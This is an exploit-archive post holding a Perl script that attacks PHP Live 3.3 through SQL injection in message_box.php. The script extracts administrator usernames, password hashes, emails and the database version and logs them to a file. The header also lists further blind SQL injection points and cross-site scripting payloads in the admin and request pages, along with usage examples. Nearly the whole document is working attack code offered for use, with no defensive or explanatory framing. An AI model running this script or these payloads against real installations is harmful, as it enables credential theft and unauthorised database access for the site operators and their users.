PHP Live 3.3 Remote SQL Injection Exploit
Posted on 01 August 2010
========================================= PHP Live 3.3 Remote SQL Injection Exploit ========================================= #!/usr/bin/perl -w ############################################################################ # # Exploit Title: PHP Live 3.3 # Date: 01/08/2010 # Author: TA4G - S8T@hotmail.com # Vendor: phplivesupport.com # Version: 3.3 # Google dork : n/a # Platform / Tested on: windows 7 # Category: webapps/0day # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST _ Sn!p3r_P4L # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Gr33tz to ### ArHack.NeT ### # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Usage: exploit.pl &lt;page&gt; &lt;path&gt; &lt;valid user&gt; # Example: perl exploit.pl http://site.com phplive TA4G # # path and username are optional. 
You can set them to &#039;no&#039; if you dont # know any information, or remove this parameters like: # # perl exploit.pl http://site.com no adalbert # perl exploit.pl http://site.com # perl exploit.pl http://site.com no no # ########################################################################### # # Other bugs in: # /phplive/admin/index.php?sid=[sid]&amp;deptid=1+[SQL BLIND INJECTION] # /phplive/request.php?l=admin&amp;x=1+[SQL BLIND INJECTION] # # /phplive/admin/index.php?sid=1[sid]&amp;deptid=&amp;search_string=&quot;&gt;&lt;Script&gt;alert(1)&lt;/Script&gt; # /phplive/message_box.php?theme=&amp;l=admin&amp;x=1&amp;deptid=1&quot;&gt;&lt;Script&gt;alert(1)&lt;/Script&gt; # ########################################################################### # # Demonstration: # # perl exploit.pl http://site.com phplive no # ... # &gt;-------Exploit Intro-------&lt; # ----------------------------- # Logging: # ----------------------------- #[*] Vulnerable: Yes #[*] Injecting: Done #[*] ----------- #[*] Userdata: # # bla:hashashashashash:S8T@hotmail.com # admin:hashashashasha:admin@TA4G.com # #[*] Writing logfile #[*] Exit # # ############################################################################ # Setting crappy vars use LWP::Simple; $link = shift or die(&quot; Read the fuckn manual &quot;); $path = shift or $path = &#039;/phplive&#039;; $user = shift or $user = &#039;admin&#039;; $link = &#039;http://&#039;.$link if($link !~ /^http:///); $add = &#039;/message_box.php?theme=&amp;l=&#039;.$user.&#039;&amp;x=1&amp;deptid=-1&#039;; ($pw,$count) = (0x37635345,0); #*********** Baby protection ************# print &quot;Please insert anti-baby-code:&quot;; $baby = &lt;STDIN&gt;; die &quot; wait a few years please... 
&quot; if ($pw != $baby); intro(); print &quot; LOGGING: ---------------------------------------- &quot;; #*********** Vulnerable-Check ************# $resp = get($link.&#039;/&#039;.$path.$add.&#039;+union+(select+1&#039;.&#039;,1&#039;x14 .&#039;,777777777,1,1)-- -&#039;); ($resp =~ m/&lt;p&gt;777777777&lt;/p&gt;/i) ? print &quot;[*] Vulnerable: Yes [*] Injecting: Done [*] -------------- &quot; : die(&quot;[*] Vulnerable: No [*] Exit &quot;); #*********** Injecting Nanobots ***********# print &quot;[*] Userdata: &quot;; $infostring = &#039;concat_ws(0x3a,777777,version(),login,password,email)&#039;; while(1) { $resp = get($link.&quot;/&quot;.$path.$add.&quot;+union+(select+1&quot;.&quot;,1&quot;x14 .&quot;,&quot;.$infostring.&quot;,0,0+from+chat_admin+limit+&quot;.$count.&quot;,1)-- -&quot;); $resp =~ m/777777:(.*)&lt;/p&gt;/i or last; @temp = split(&quot;:&quot;,$1); push(@data,($temp[1].&quot;:&quot;.$temp[2].&quot;:&quot;.$temp[3])); print $temp[1].&quot;:&quot;.$temp[2].&quot;:&quot;.$temp[3].&quot; &quot;; $count++; } #*********** Write2file *****************# $text = &quot;[TA4G] [PHP Live 3.3] SQL Injection Exploit: [*] Link: &quot;.$link.&quot;/&quot;.$path.$add.&quot; &quot;. 
&quot;[*] mySQL Version: &quot;.substr($temp[0],0,3).&quot; [*] Userdata: &quot;; open(LULZ,&quot;&gt;&gt;log.txt&quot;); print LULZ $text; foreach(@data) {print LULZ $_.&quot; &quot;;} close LULZ; print &quot; [*] Writing Logfile [*] Exit &quot;; #************ Leet intro **************# sub intro { print q { --------------------------------------- *************************************** * * [PHP Live 3.3] SQL Injection Exploit * written by TA4G * ----------- * Usage: exploit.pl &lt;url&gt; &lt;path&gt; &lt;user&gt; * * path and user are optional * *************************************** --------------------------------------- }; }